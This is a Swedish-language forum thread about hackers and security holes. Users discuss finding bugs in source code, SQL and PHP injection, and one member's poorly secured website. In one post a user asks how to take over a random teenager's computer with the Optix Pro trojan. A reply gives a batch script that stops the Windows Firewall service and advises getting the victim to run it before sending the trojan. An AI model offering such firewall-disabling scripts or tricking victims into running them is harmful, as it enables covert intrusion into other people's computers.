Jump to content

Hackers, ett problem?


SlewME
 Share

Recommended Posts

  • Inlägg 109
  • Ålder
  • Senaste inlägg

Toppbidragare

Hm, det enda jag inte fattar är hur man "kommer in" genom hålen. :lol:

Har inte så mycket överflödig tid att jag orkar hålla på med sånt men man testar sig fram, givetvis ska man ha kunskap också.

De flesta testar saker som de vet brukar fungera, fungerar inte det så kommer de inte längre medans andra letar tills de kommer igenom.

Du måste givetvis veta hur exempelvis Windows är uppbyggt för att kunna hitta hål också.

Länk till kommentar
Dela på andra sidor

Hihi, när vi nu är inne på ämnet: finns det något enkelt sätt man kna "ta över" random fjortis- dator, och leka runt. När jag säger leka runt menar jag Optix pro- stajleh, inte förstöra. Optix hade varit perfekt, men det blir ju stoppat av brandväggarna.

Länk till kommentar
Dela på andra sidor

Hm, det enda jag inte fattar är hur man "kommer in" genom hålen.  :lol:

Om det (målet) är open-source, kan man kolla i källkoden efter buggar. En sådan enkel sak som == istället för >= kan vara ett enormt säkerhetshål. Om det inte är open-source, kan man kolla på icke produkt-specifika buggar som motsvarande open-source-produkt har fixat nyligen. Eftersom det bara är tillverkaren av ett icke-open-source-program som kan leta buggar, brukar det ta längre tid att fixa dem. Om målet är en hemsida och man vet att den som sköter den inte prioriterar säkerheten (kollar snett på SlewME ^_^ ), så kan man bland annat prova på SQL injections, eller (om admin är riktigt n00b) PHP injections.

@Siana: Skriv

@echo off

net stop "Windows Firewall/Internet Connection Sharing (ICS)"

i en .bat-fil, och få offret att köra det innan du skickar optix. Finns dock en risk att det dyker upp en obehaglig informationsruta i hörnet.

EDIT: @SlewME: Grattis!

Redigerad av Xogede
Länk till kommentar
Dela på andra sidor

Skrivet (redigerad)
(kollar snett på SlewME :lol: )

Har lagat många utav hålen tackvare att du hittade dem ^_^

Det kan jag bara tacka för.

SQL inject var ju pinsamt. Men sedan småhål som att jag glömt, vissa grejer vad det gäller att bara tilldela admin saker är inte ovanligt.

Redigerad av SlewME
Länk till kommentar
Dela på andra sidor

Skrivet (redigerad)
Du måste lära dig att prioritera säkerheten.

Steg 1: Skaffa Linux. :)

Felet med mig är att jag är en godtrogen människa och bara för att jag inte gillar att sabba så förväntar jag mig inte att andra gör det heller, något jag borde ändra på. Säkerheten kring mina webbserverar är dock annat.

Sedan att jag missat open_basedir i php.ini var inte bra.

Redigerad av SlewME
Länk till kommentar
Dela på andra sidor

Du måste lära dig att prioritera säkerheten.

Steg 1: Skaffa Linux. :blink:

Visst, det görs inga virus till Linux men jag förstår inte varför folk väljer det till servrar? För att det drar lite prestanda eller? Det är lätt att knäcka som fan ju. -_-

Länk till kommentar
Dela på andra sidor

Om det (målet) är open-source, kan man kolla i källkoden efter buggar. En sådan enkel sak som == istället för >= kan vara ett enormt säkerhetshål.

Men wow, om det är sånt så måste man ju vara

riktigt klantig när man skriver koden! -_-

Edit:

Du menar inte "> istället för >=" då?

Redigerad av Patrik
Länk till kommentar
Dela på andra sidor

Nej. Du har aldrig försökt programmera väl? Skulle du gjort det skulle du veta att man använder >=.

Aja, inte lätt för dig att veta.

Eh, Wtf?

Har programmerat rätt länge. :blink:

1. Alla språk ser inte likadana ut.

2. Jag förstår inte i vilket sammanhang han menade.

Så du kan inte säga att man "ska" veta olika saker, eftersom

"gramatiken" (om man kan säga så) ser helt annolunda ut i vissa

fall. Vet inte ens vilket språk han menar. -_-

Länk till kommentar
Dela på andra sidor

Eh, Wtf?

Har programmerat rätt länge. :blink:

1. Alla språk ser inte likadana ut.

2. Jag förstår inte i vilket sammanhang han menade.

Så du kan inte säga att man "ska" veta olika saker, eftersom

"gramatiken" (om man kan säga så) ser helt annolunda ut i vissa

fall. Vet inte ens vilket språk han menar. -_-

Okej. Dom jag har lekt lite med (PHP, C++ och Java) använder >= iaf. Vad kodar du då?

Länk till kommentar
Dela på andra sidor

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Gäst
Skriv inlägg...

×   Innehåll kopierat inklusive formatering.   Ta bort formatering

  Only 75 emoji are allowed.

×   Din länk har expanderats till ett media-block.   Visa länk istället

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share


×
×
  • Create New...